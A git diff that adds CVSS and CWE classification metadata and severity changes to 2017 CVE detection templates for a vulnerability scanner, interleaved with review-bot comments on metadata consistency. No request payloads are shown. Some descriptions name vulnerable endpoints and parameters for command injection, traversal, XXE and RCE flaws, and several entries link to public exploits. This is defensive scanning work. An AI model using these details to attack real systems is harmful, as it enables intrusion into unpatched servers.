 - method: GET
diff --git a/cves/2017/CVE-2017-1000028.yaml b/cves/2017/CVE-2017-1000028.yaml
index 7dc6d15282..c1eb936feb 100644
--- a/cves/2017/CVE-2017-1000028.yaml
+++ b/cves/2017/CVE-2017-1000028.yaml
@@ -7,6 +7,11 @@ info:
 description: Oracle, GlassFish Server Open Source Edition 4.1 is vulnerable to both authenticated and unauthenticated Directory Traversal vulnerability, that can be exploited by issuing a specially crafted HTTP GET request.
 reference: https://www.exploit-db.com/exploits/45196
 tags: cve,cve2017,oracle,glassfish,lfi
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 7.50
+ cve-id: CVE-2017-1000028
+ cwe-id: CWE-22
 requests:
 - method: GET
diff --git a/cves/2017/CVE-2017-1000170.yaml b/cves/2017/CVE-2017-1000170.yaml
index cb3e001dd0..ef6415afce 100644
--- a/cves/2017/CVE-2017-1000170.yaml
+++ b/cves/2017/CVE-2017-1000170.yaml
@@ -7,6 +7,11 @@ info:
 reference: https://www.exploit-db.com/exploits/49693
 description: jqueryFileTree 2.1.5 and older Directory Traversal
 tags: cve,cve2017,wordpress,wp-plugin,lfi
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 7.50
+ cve-id: CVE-2017-1000170
+ cwe-id: CWE-22
 requests:
 - method: POST
diff --git a/cves/2017/CVE-2017-1000486.yaml b/cves/2017/CVE-2017-1000486.yaml
index 16dc0d9801..d7a07c5e57 100644
--- a/cves/2017/CVE-2017-1000486.yaml
+++ b/cves/2017/CVE-2017-1000486.yaml
@@ -11,6 +11,11 @@ info:
 - https://blog.mindedsecurity.com/2016/02/rce-in-oracle-netbeans-opensource.html
 - https://nvd.nist.gov/vuln/detail/CVE-2017-1000486
 tags: cve,cve2017,primetek,rce
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.80
+ cve-id: CVE-2017-1000486
+ cwe-id: CWE-326
 requests:
 - raw:
diff --git a/cves/2017/CVE-2017-10075.yaml b/cves/2017/CVE-2017-10075.yaml
index 34dde57e91..d7eb8e1003 100644
--- a/cves/2017/CVE-2017-10075.yaml
+++ b/cves/2017/CVE-2017-10075.yaml
@@ -3,10 +3,14 @@ id: CVE-2017-10075
 info:
 name: Oracle Content Server XSS
 author: madrobot
- severity: medium
+ severity: high
 description: The vulnerability can be used to include HTML or JavaScript code to the affected web page. The code is executed in the browser of users if they visit the manipulated site.
 reference: http://www.oracle.com/technetwork/security-advisory/cpujul2017-3236622.html
 tags: cve,cve2017,xss,oracle
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N
+ cvss-score: 8.20
+ cve-id: CVE-2017-10075
 requests:
 - method: GET
diff --git a/cves/2017/CVE-2017-10271.yaml b/cves/2017/CVE-2017-10271.yaml
index 26de578c10..1e9b5d37af 100644
--- a/cves/2017/CVE-2017-10271.yaml
+++ b/cves/2017/CVE-2017-10271.yaml
@@ -9,6 +9,10 @@ info:
 - https://github.com/vulhub/vulhub/tree/fda47b97c7d2809660a4471539cd0e6dbf8fac8c/weblogic/CVE-2017-10271
 - https://github.com/SuperHacker-liuan/cve-2017-10271-poc
 tags: cve,cve2017,rce,oracle,weblogic
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
+ cvss-score: 7.50
+ cve-id: CVE-2017-10271
 requests:
 - raw:
diff --git a/cves/2017/CVE-2017-11444.yaml b/cves/2017/CVE-2017-11444.yaml
index 0af1f0dba3..324b2e11ac 100644
--- a/cves/2017/CVE-2017-11444.yaml
+++ b/cves/2017/CVE-2017-11444.yaml
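Review bot: The vector `CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H` with `cvss-score: 7.50` added for CVE-2017-10271 scores availability impact only, while the template is tagged `rce` and both reference links in the context lines are RCE proofs of concept; this looks like the vendor advisory rating being mirrored verbatim. That is defensible if the repository's policy is to copy NVD/vendor data unchanged, but a reader scanning `classification` will conclude this is a DoS, so I would add a one-line comment beside the block, e.g. `# vendor CVSS vector; public exploitation yields unauthenticated RCE (see references)`, and make sure the `severity` line outside this hunk still says `critical`. The CVE-2017-10075 and CVE-2017-10271 blocks are also the only ones on this line without a `cwe-id`; if NVD assigns none for these Oracle entries, state that in a comment rather than leaving the field silently absent.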
@@ -3,12 +3,17 @@ id: CVE-2017-11444
 info:
 name: Subrion CMS SQL Injection
 author: dwisiswant0
- severity: high
+ severity: critical
 description: Subrion CMS before 4.1.5.10 has a SQL injection vulnerability in /front/search.php via the $_GET array.
 reference:
 - https://github.com/intelliants/subrion/issues/479
 - https://mp.weixin.qq.com/s/89mCnjUCvmptLsKaeVlC9Q
 tags: cve,cve2017,sqli,subrion
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.80
+ cve-id: CVE-2017-11444
+ cwe-id: CWE-89
 requests:
 - method: GET
diff --git a/cves/2017/CVE-2017-12149.yaml b/cves/2017/CVE-2017-12149.yaml
index fd2fd2781a..8ead0e5c2a 100755
--- a/cves/2017/CVE-2017-12149.yaml
+++ b/cves/2017/CVE-2017-12149.yaml
@@ -10,6 +10,11 @@ info:
 - https://chowdera.com/2020/12/20201229190934023w.html
 - https://github.com/vulhub/vulhub/tree/master/jboss/CVE-2017-12149
 tags: cve,cve2017,java,rce,deserialization
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.80
+ cve-id: CVE-2017-12149
+ cwe-id: CWE-502
 requests:
 - raw:
diff --git a/cves/2017/CVE-2017-12542.yaml b/cves/2017/CVE-2017-12542.yaml
index da7a45c350..e6b40b0d91 100644
--- a/cves/2017/CVE-2017-12542.yaml
+++ b/cves/2017/CVE-2017-12542.yaml
@@ -9,6 +9,10 @@ info:
 - https://nvd.nist.gov/vuln/detail/CVE-2017-12542
 - https://www.exploit-db.com/exploits/44005
 tags: cve,cve2017,ilo4,hpe
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
+ cvss-score: 10.00
+ cve-id: CVE-2017-12542
 requests:
 - method: GET
diff --git a/cves/2017/CVE-2017-12611.yaml b/cves/2017/CVE-2017-12611.yaml
index ae2639eebb..d4f8d1050e 100644
--- a/cves/2017/CVE-2017-12611.yaml
+++ b/cves/2017/CVE-2017-12611.yaml
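Review bot: The CVE-2017-12542 classification block omits `cwe-id` while the other two hunks on this line (CVE-2017-11444, CVE-2017-12149) carry one; NVD appears to classify the iLO 4 issue as CWE-287 (Improper Authentication), which is worth confirming before adding `cwe-id: CWE-287`. With `cvss-score: 10.00` and `S:C` this is the highest-rated entry in the patch, yet its `severity` line sits outside the hunk and is not touched here; check that it already reads `critical` so the two fields agree, as they were made to agree for CVE-2017-11444 in the first hunk.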
@@ -7,6 +7,11 @@ info:
 description: In Apache Struts 2.0.0 through 2.3.33 and 2.5 through 2.5.10.1, using an unintentional expression in a Freemarker tag instead of string literals can lead to a RCE attack.
 reference: https://struts.apache.org/docs/s2-053.html
 tags: cve,cve2017,apache,rce,struts
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.80
+ cve-id: CVE-2017-12611
+ cwe-id: CWE-20
 requests:
 - method: POST
diff --git a/cves/2017/CVE-2017-12615.yaml b/cves/2017/CVE-2017-12615.yaml
index e78786d62d..2c16f2c1fe 100644
--- a/cves/2017/CVE-2017-12615.yaml
+++ b/cves/2017/CVE-2017-12615.yaml
@@ -3,7 +3,7 @@ id: CVE-2017-12615
 info:
 name: Apache Tomcat RCE
 author: pikpikcu
- severity: critical
+ severity: high
 tags: cve,cve2017,apache,rce
 reference: https://github.com/vulhub/vulhub/tree/master/tomcat/CVE-2017-12615
 description: |
@@ -11,6 +11,11 @@ info:
 This is likely a security measure to prevent an attacker from uploading a JSP shell and gaining remote code execution on the server. However, due to the insufficient checks, an attacker could gain remote code execution on 7.0.{0 to 79} Tomcat servers that has enabled PUT by requesting PUT method on the Tomcat server using a specially crafted HTTP request.
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 8.10
+ cve-id: CVE-2017-12615
+ cwe-id: CWE-434
 requests:
 - method: PUT
diff --git a/cves/2017/CVE-2017-12629.yaml b/cves/2017/CVE-2017-12629.yaml
index f9f543a9b9..653122ae26 100644
--- a/cves/2017/CVE-2017-12629.yaml
+++ b/cves/2017/CVE-2017-12629.yaml
@@ -10,6 +10,12 @@ info:
 - https://twitter.com/honoki/status/1298636315613974532
 - https://github.com/vulhub/vulhub/tree/master/solr/CVE-2017-12629-XXE
 - https://github.com/vulhub/vulhub/tree/master/solr/CVE-2017-12629-RCE
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.80
+ cve-id: CVE-2017-12629
+ cwe-id: CWE-611
+ description: "Remote code execution occurs in Apache Solr before 7.1 with Apache Lucene before 7.1 by exploiting XXE in conjunction with use of a Config API add-listener command to reach the RunExecutableListener class. Elasticsearch, although it uses Lucene, is NOT vulnerable to this. Note that the XML external entity expansion vulnerability occurs in the XML Query Parser which is available, by default, for any query request with parameters deftype=xmlparser and can be exploited to upload malicious data to the /upload request handler or as Blind XXE using ftp wrapper in order to read arbitrary local files from the Solr server. Note also that the second vulnerability relates to remote code execution using the RunExecutableListener available on all affected versions of Solr."
 requests:
 - raw:
diff --git a/cves/2017/CVE-2017-12635.yaml b/cves/2017/CVE-2017-12635.yaml
index 5565f23393..7e7edb5586 100644
--- a/cves/2017/CVE-2017-12635.yaml
+++ b/cves/2017/CVE-2017-12635.yaml
@@ -3,10 +3,15 @@ id: CVE-2017-12635
 info:
 name: Apache CouchDB 1.7.0 / 2.x < 2.1.1 Remote Privilege Escalation
 author: pikpikcu
- severity: high
+ severity: critical
 description: Due to differences in the Erlang-based JSON parser and JavaScript-based JSON parser, it is possible in Apache CouchDB before 1.7.0 and 2.x before 2.1.1 to submit _users documents with duplicate keys for 'roles' used for access control within the database, including the special case '_admin' role, that denotes administrative users. In combination with CVE-2017-12636 (Remote Code Execution), this can be used to give non-admin users access to arbitrary shell commands on the server as the database system user. The JSON parser differences result in behaviour that if two 'roles' keys are available in the JSON, the second one will be used for authorising the document write, but the first 'roles' key is used for subsequent authorization for the newly created user. By design, users can not assign themselves roles. The vulnerability allows non-admin users to give themselves admin privileges.
 reference: https://github.com/assalielmehdi/CVE-2017-12635
 tags: cve,cve2017,couchdb
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.80
+ cve-id: CVE-2017-12635
+ cwe-id: CWE-269
 requests:
 - raw:
diff --git a/cves/2017/CVE-2017-12637.yaml b/cves/2017/CVE-2017-12637.yaml
index 46cbdb8d04..905e10391a 100644
--- a/cves/2017/CVE-2017-12637.yaml
+++ b/cves/2017/CVE-2017-12637.yaml
@@ -10,6 +10,11 @@ info:
 - https://www.cvedetails.com/cve/CVE-2017-12637/
 - https://nvd.nist.gov/vuln/detail/CVE-2017-12637
 - https://download.ernw-insight.de/troopers/tr18/slides/TR18_SAP_SAP-Bugs-The-Phantom-Security.pdf
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 7.50
+ cve-id: CVE-2017-12637
+ cwe-id: CWE-22
 requests:
 - method: GET
diff --git a/cves/2017/CVE-2017-12794.yaml b/cves/2017/CVE-2017-12794.yaml
index 56d43089ee..ad1ea847cc 100644
--- a/cves/2017/CVE-2017-12794.yaml
+++ b/cves/2017/CVE-2017-12794.yaml
@@ -10,6 +10,11 @@ info:
 description: |
 In Django 1.10.x before 1.10.8 and 1.11.x before 1.11.5, HTML autoescaping was disabled in a portion of the template for the technical 500 debug page. Given the right circumstances, this allowed a cross-site scripting attack. This vulnerability shouldn't affect most production sites since you shouldn't run with "DEBUG = True" (which makes this page accessible) in your production settings.
 tags: xss,django,cve,cve2017
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.10
+ cve-id: CVE-2017-12794
+ cwe-id: CWE-79
 requests:
 - method: GET
diff --git a/cves/2017/CVE-2017-14535.yaml b/cves/2017/CVE-2017-14535.yaml
index 6a91a097cf..a9b3be6385 100644
--- a/cves/2017/CVE-2017-14535.yaml
+++ b/cves/2017/CVE-2017-14535.yaml
@@ -8,6 +8,12 @@ info:
 - https://secur1tyadvisory.wordpress.com/2018/02/11/trixbox-os-command-injection-vulnerability-cve-2017-14535/
 - https://www.exploit-db.com/exploits/49913
 tags: cve,cve2017,trixbox,rce
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 8.80
+ cve-id: CVE-2017-14535
+ cwe-id: CWE-78
+ description: "trixbox 2.8.0.4 has OS command injection via shell metacharacters in the lang parameter to /maint/modules/home/index.php."
 requests:
 - raw:
diff --git a/cves/2017/CVE-2017-14537.yaml b/cves/2017/CVE-2017-14537.yaml
index 9772411357..03689a2002 100644
--- a/cves/2017/CVE-2017-14537.yaml
+++ b/cves/2017/CVE-2017-14537.yaml
@@ -10,6 +10,11 @@ info:
 - https://nvd.nist.gov/vuln/detail/CVE-2017-14537
 - https://secur1tyadvisory.wordpress.com/2018/02/13/trixbox-multiple-path-traversal-vulnerabilities-cve-2017-14537/
 - https://sourceforge.net/projects/asteriskathome/ # vendor homepage
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 6.50
+ cve-id: CVE-2017-14537
+ cwe-id: CWE-22
 requests:
 - raw:
diff --git a/cves/2017/CVE-2017-14651.yaml b/cves/2017/CVE-2017-14651.yaml
index 763aeee7c4..91fc63e9f3 100644
--- a/cves/2017/CVE-2017-14651.yaml
+++ b/cves/2017/CVE-2017-14651.yaml
@@ -6,6 +6,15 @@ info:
 severity: medium
 description: WSO2 Data Analytics Server 3.1.0 has XSS in carbon/resources/add_collection_ajaxprocessor.jsp via the collectionName or parentPath parameter.
 tags: cve,cve2017,wso2,xss
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 4.80
+ cve-id: CVE-2017-14651
+ cwe-id: CWE-79
+ reference:
+ - https://github.com/cybersecurityworks/Disclosed/issues/15
+ - https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2017-0265
+ - https://cybersecurityworks.com/zerodays/cve-2017-14651-wso2.html
 requests:
 - method: GET
diff --git a/cves/2017/CVE-2017-14849.yaml b/cves/2017/CVE-2017-14849.yaml
index 184da5d96f..6a386ab381 100644
--- a/cves/2017/CVE-2017-14849.yaml
+++ b/cves/2017/CVE-2017-14849.yaml
@@ -6,6 +6,15 @@ info:
 severity: high
 description: Node.js 8.5.0 before 8.6.0 allows remote attackers to access unintended files, because a change to ".." handling was incompatible with the pathname validation used by unspecified community modules.
 tags: cve,cve2017,nodejs,lfi
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 7.50
+ cve-id: CVE-2017-14849
+ cwe-id: CWE-22
+ reference:
+ - https://twitter.com/nodejs/status/913131152868876288
+ - https://nodejs.org/en/blog/vulnerability/september-2017-path-validation/
+ - http://www.securityfocus.com/bid/101056
 requests:
 - method: GET
diff --git a/cves/2017/CVE-2017-15647.yaml b/cves/2017/CVE-2017-15647.yaml
index 5102cbacf4..57a6eda186 100644
--- a/cves/2017/CVE-2017-15647.yaml
+++ b/cves/2017/CVE-2017-15647.yaml
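Review bot: The new `reference:` lists for CVE-2017-14651 and CVE-2017-14849 are inserted after the `classification:` block, whereas templates elsewhere in this patch keep `reference` between `description` and `tags` (CVE-2017-15647 on the next line is one example); parsing is unaffected, but the `info` block ordering becomes inconsistent across the repository, so I would move the three `reference` lines up directly under `description`. Also `http://www.securityfocus.com/bid/101056` is a plain-http link to a site that, to my knowledge, no longer serves BID pages; consider dropping it or replacing it with `https://nvd.nist.gov/vuln/detail/CVE-2017-14849`, which the other templates in this patch use as their canonical reference.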
@@ -3,12 +3,17 @@ id: CVE-2017-15647
 info:
 name: FiberHome - Directory Traversal
 author: daffainfo
- severity: medium
+ severity: high
 description: On FiberHome routers, Directory Traversal exists in /cgi-bin/webproc via the getpage parameter in conjunction with a crafted var:page value.
 reference:
 - https://www.exploit-db.com/exploits/44054
 - https://www.cvedetails.com/cve/CVE-2017-15647
 tags: cve,cve2017,lfi,router
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 7.50
+ cve-id: CVE-2017-15647
+ cwe-id: CWE-22
 requests:
 - method: GET
diff --git a/cves/2017/CVE-2017-15715.yaml b/cves/2017/CVE-2017-15715.yaml
index 2de5b8d83a..2a2853e552 100644
--- a/cves/2017/CVE-2017-15715.yaml
+++ b/cves/2017/CVE-2017-15715.yaml
@@ -7,6 +7,11 @@ info:
 reference: https://github.com/vulhub/vulhub/tree/master/httpd/CVE-2017-15715
 severity: high
 tags: cve,cve2017,apache,httpd,fileupload
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 8.10
+ cve-id: CVE-2017-15715
+ cwe-id: CWE-20
 requests:
 - raw:
diff --git a/cves/2017/CVE-2017-15944.yaml b/cves/2017/CVE-2017-15944.yaml
index f68fcd4a77..41f4f5c82f 100644
--- a/cves/2017/CVE-2017-15944.yaml
+++ b/cves/2017/CVE-2017-15944.yaml
@@ -7,8 +7,12 @@ info:
 reference:
 - https://www.exploit-db.com/exploits/43342
 - http://blog.orange.tw/2019/07/attacking-ssl-vpn-part-1-preauth-rce-on-palo-alto.html
- severity: high
+ severity: critical
 tags: cve,cve2017,rce,vpn,paloalto,globalprotect
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.80
+ cve-id: CVE-2017-15944
 requests:
 - raw:
diff --git a/cves/2017/CVE-2017-16806.yaml b/cves/2017/CVE-2017-16806.yaml
index ef7744125e..e4057dae37 100644
--- a/cves/2017/CVE-2017-16806.yaml
+++ b/cves/2017/CVE-2017-16806.yaml
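Review bot: The `classification:` block added for CVE-2017-15944 has no `cwe-id`, while every other block in this commit carries one (the block for CVE-2017-3506 further down the page is the only other exception). If the upstream record lists no CWE for these two, a one-line comment under `cve-id`, `# no CWE assigned in the source record`, would make the gap deliberate rather than look like a missed field. If a CWE does exist, add it so the files stay uniform with the rest of the change.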
@@ -6,6 +6,12 @@ info:
 reference: https://www.exploit-db.com/exploits/43141
 severity: high
 tags: cve,cve2017,ulterius,traversal
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 7.50
+ cve-id: CVE-2017-16806
+ cwe-id: CWE-22
+ description: "The Process function in RemoteTaskServer/WebServer/HttpServer.cs in Ulterius before 1.9.5.0 allows HTTP server directory traversal."
 requests:
 - method: GET
diff --git a/cves/2017/CVE-2017-16877.yaml b/cves/2017/CVE-2017-16877.yaml
index 6af9898153..ed8c14a5be 100644
--- a/cves/2017/CVE-2017-16877.yaml
+++ b/cves/2017/CVE-2017-16877.yaml
@@ -7,6 +7,11 @@ info:
 description: ZEIT Next.js before 2.4.1 has directory traversal under the /_next and /static request namespace, allowing attackers to obtain sensitive information.
 reference: https://medium.com/@theRaz0r/arbitrary-file-reading-in-next-js-2-4-1-34104c4e75e9
 tags: cve,cve2017,nextjs,lfi
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 7.50
+ cve-id: CVE-2017-16877
+ cwe-id: CWE-22
 requests:
 - method: GET
diff --git a/cves/2017/CVE-2017-17043.yaml b/cves/2017/CVE-2017-17043.yaml
index 8dab040905..9eb08d7a3a 100644
--- a/cves/2017/CVE-2017-17043.yaml
+++ b/cves/2017/CVE-2017-17043.yaml
@@ -7,6 +7,11 @@ info:
 description: The Emag Marketplace Connector plugin 1.0.0 for WordPress has reflected XSS because the parameter "post" to /wp-content/plugins/emag-marketplace-connector/templates/order/awb-meta-box.php is not filtered correctly.
 reference: https://nvd.nist.gov/vuln/detail/CVE-2017-17043
 tags: cve,cve2017,wordpress,xss,wp-plugin
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.10
+ cve-id: CVE-2017-17043
+ cwe-id: CWE-79
 requests:
 - method: GET
diff --git a/cves/2017/CVE-2017-17059.yaml b/cves/2017/CVE-2017-17059.yaml
index 10ad0d299d..5fcc0923df 100644
--- a/cves/2017/CVE-2017-17059.yaml
+++ b/cves/2017/CVE-2017-17059.yaml
@@ -9,6 +9,11 @@ info:
 - https://github.com/NaturalIntelligence/wp-thumb-post/issues/1
 - https://nvd.nist.gov/vuln/detail/CVE-2017-17059
 tags: cve,cve2017,wordpress,xss,wp-plugin
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.10
+ cve-id: CVE-2017-17059
+ cwe-id: CWE-79
 requests:
 - method: POST
diff --git a/cves/2017/CVE-2017-17451.yaml b/cves/2017/CVE-2017-17451.yaml
index 9a2c3bce2f..2cd0371034 100644
--- a/cves/2017/CVE-2017-17451.yaml
+++ b/cves/2017/CVE-2017-17451.yaml
@@ -7,6 +7,11 @@ info:
 description: The WP Mailster plugin before 1.5.5 for WordPress has XSS in the unsubscribe handler via the mes parameter to view/subscription/unsubscribe2.php.
 reference: https://nvd.nist.gov/vuln/detail/CVE-2017-17451
 tags: cve,cve2017,wordpress,xss,wp-plugin
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.10
+ cve-id: CVE-2017-17451
+ cwe-id: CWE-79
 requests:
 - method: GET
diff --git a/cves/2017/CVE-2017-17562.yaml b/cves/2017/CVE-2017-17562.yaml
index ab048ea172..0f87ecde9f 100644
--- a/cves/2017/CVE-2017-17562.yaml
+++ b/cves/2017/CVE-2017-17562.yaml
@@ -10,6 +10,11 @@ info:
 - https://github.com/vulhub/vulhub/tree/master/goahead/CVE-2017-17562
 severity: high
 tags: cve,cve2017,rce,embedthis,goahead,fuzz
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 8.10
+ cve-id: CVE-2017-17562
+ cwe-id: CWE-20
 requests:
 - raw:
diff --git a/cves/2017/CVE-2017-18024.yaml b/cves/2017/CVE-2017-18024.yaml
index 9388b6bf6c..89de79241d 100644
--- a/cves/2017/CVE-2017-18024.yaml
+++ b/cves/2017/CVE-2017-18024.yaml
@@ -11,6 +11,11 @@ info:
 description: |
 AvantFAX 3.3.3 has XSS via an arbitrary parameter name to the default URI, as demonstrated by a parameter whose name contains a SCRIPT element and whose value is 1.
 tags: cve,cve2017,xss,avantfax
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.10
+ cve-id: CVE-2017-18024
+ cwe-id: CWE-79
 requests:
 - raw:
diff --git a/cves/2017/CVE-2017-18536.yaml b/cves/2017/CVE-2017-18536.yaml
index 7bed4c11c3..4f60e9dca3 100644
--- a/cves/2017/CVE-2017-18536.yaml
+++ b/cves/2017/CVE-2017-18536.yaml
@@ -7,6 +7,11 @@ info:
 description: The Stop User Enumeration WordPress plugin was affected by an Unauthenticated Reflected Cross-Site Scripting (XSS) security vulnerability.
 reference: https://wpscan.com/vulnerability/956cc5fd-af06-43ac-aa85-46b468c73501
 tags: cve,cve2017,wordpress,xss,wp-plugin
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.10
+ cve-id: CVE-2017-18536
+ cwe-id: CWE-79
 requests:
 - method: GET
diff --git a/cves/2017/CVE-2017-18638.yaml b/cves/2017/CVE-2017-18638.yaml
index fc7f16e8cc..8c240d1426 100644
--- a/cves/2017/CVE-2017-18638.yaml
+++ b/cves/2017/CVE-2017-18638.yaml
@@ -11,6 +11,11 @@ info:
 - https://github.com/advisories/GHSA-vfj6-275q-4pvm
 - https://nvd.nist.gov/vuln/detail/CVE-2017-18638
 tags: cve,cve2017,graphite,ssrf,oob
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 7.50
+ cve-id: CVE-2017-18638
+ cwe-id: CWE-918
 requests:
 - method: GET
diff --git a/cves/2017/CVE-2017-3506.yaml b/cves/2017/CVE-2017-3506.yaml
index 5ccba81a04..0e0bff68e3 100644
--- a/cves/2017/CVE-2017-3506.yaml
+++ b/cves/2017/CVE-2017-3506.yaml
@@ -9,6 +9,10 @@ info:
 reference:
 - https://hackerone.com/reports/810778
 - https://nvd.nist.gov/vuln/detail/CVE-2017-3506
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N
+ cvss-score: 7.40
+ cve-id: CVE-2017-3506
 requests:
 - raw:
diff --git a/cves/2017/CVE-2017-3528.yaml b/cves/2017/CVE-2017-3528.yaml
index 2003bf9c99..b172154381 100644
--- a/cves/2017/CVE-2017-3528.yaml
+++ b/cves/2017/CVE-2017-3528.yaml
@@ -3,11 +3,17 @@ id: CVE-2017-3528
 info:
 name: Oracle E-Business Suite 12.1.3/12.2.x - Open Redirect
 author: 0x_Akoko
- severity: low
+ severity: medium
 reference:
 - https://blog.zsec.uk/cve-2017-3528/
 - https://www.exploit-db.com/exploits/43592
 tags: oracle,redirect
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N
+ cvss-score: 5.40
+ cve-id: CVE-2017-3528
+ cwe-id: CWE-601
+ description: "Vulnerability in the Oracle Applications Framework component of Oracle E-Business Suite (subcomponent: Popup windows (lists of values, datepicker, etc.)). Supported versions that are affected are 12.1.3, 12.2.3, 12.2.4, 12.2.5 and 12.2.6. Easily \"exploitable\" vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Applications Framework. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Applications Framework, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Applications Framework accessible data. CVSS 3.0 Base Score 4.7 (Integrity impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:L/A:N)."
 requests:
 - method: GET
diff --git a/cves/2017/CVE-2017-3881.yaml b/cves/2017/CVE-2017-3881.yaml
index 3e200f2bf4..e852d525d0 100644
--- a/cves/2017/CVE-2017-3881.yaml
+++ b/cves/2017/CVE-2017-3881.yaml
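Review bot: The added `description` for CVE-2017-3528 ends with "CVSS 3.0 Base Score 4.7" and the vector `CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:L/A:N`, while the `classification:` block added a few lines above states `cvss-score: 5.40` with `S:U/C:L/I:L/A:N`, so the same file now carries two different scores and vectors for one CVE. I cannot tell from the diff which source each value was taken from; either align the block with the vendor text or cut the trailing score sentences from the description so it ends at "...Oracle Applications Framework accessible data.", leaving one authoritative vector for whoever triages hits. The `severity: medium` change is consistent with either score, so that line needs no change.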
@@ -10,6 +10,11 @@ info:
 - https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/auxiliary/dos/cisco/ios_telnet_rocem.md
 description: RCE exploit code is available for Cisco Catalyst 2960 switch model. This exploit is firmware dependent.
 tags: cve,cve2017,cisco,rce,network
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.80
+ cve-id: CVE-2017-3881
+ cwe-id: CWE-20
 network:
 - inputs:
diff --git a/cves/2017/CVE-2017-4011.yaml b/cves/2017/CVE-2017-4011.yaml
index 23b1ffb9b3..835026085e 100644
--- a/cves/2017/CVE-2017-4011.yaml
+++ b/cves/2017/CVE-2017-4011.yaml
@@ -10,6 +10,11 @@ info:
 - https://kc.mcafee.com/corporate/index?page=content&id=SB10198
 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-4011
 tags: cve,cve2017,mcafee,xss
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.10
+ cve-id: CVE-2017-4011
+ cwe-id: CWE-79
 requests:
 - method: GET
diff --git a/cves/2017/CVE-2017-5487.yaml b/cves/2017/CVE-2017-5487.yaml
index f7e9caec0e..75f2ff83e6 100644
--- a/cves/2017/CVE-2017-5487.yaml
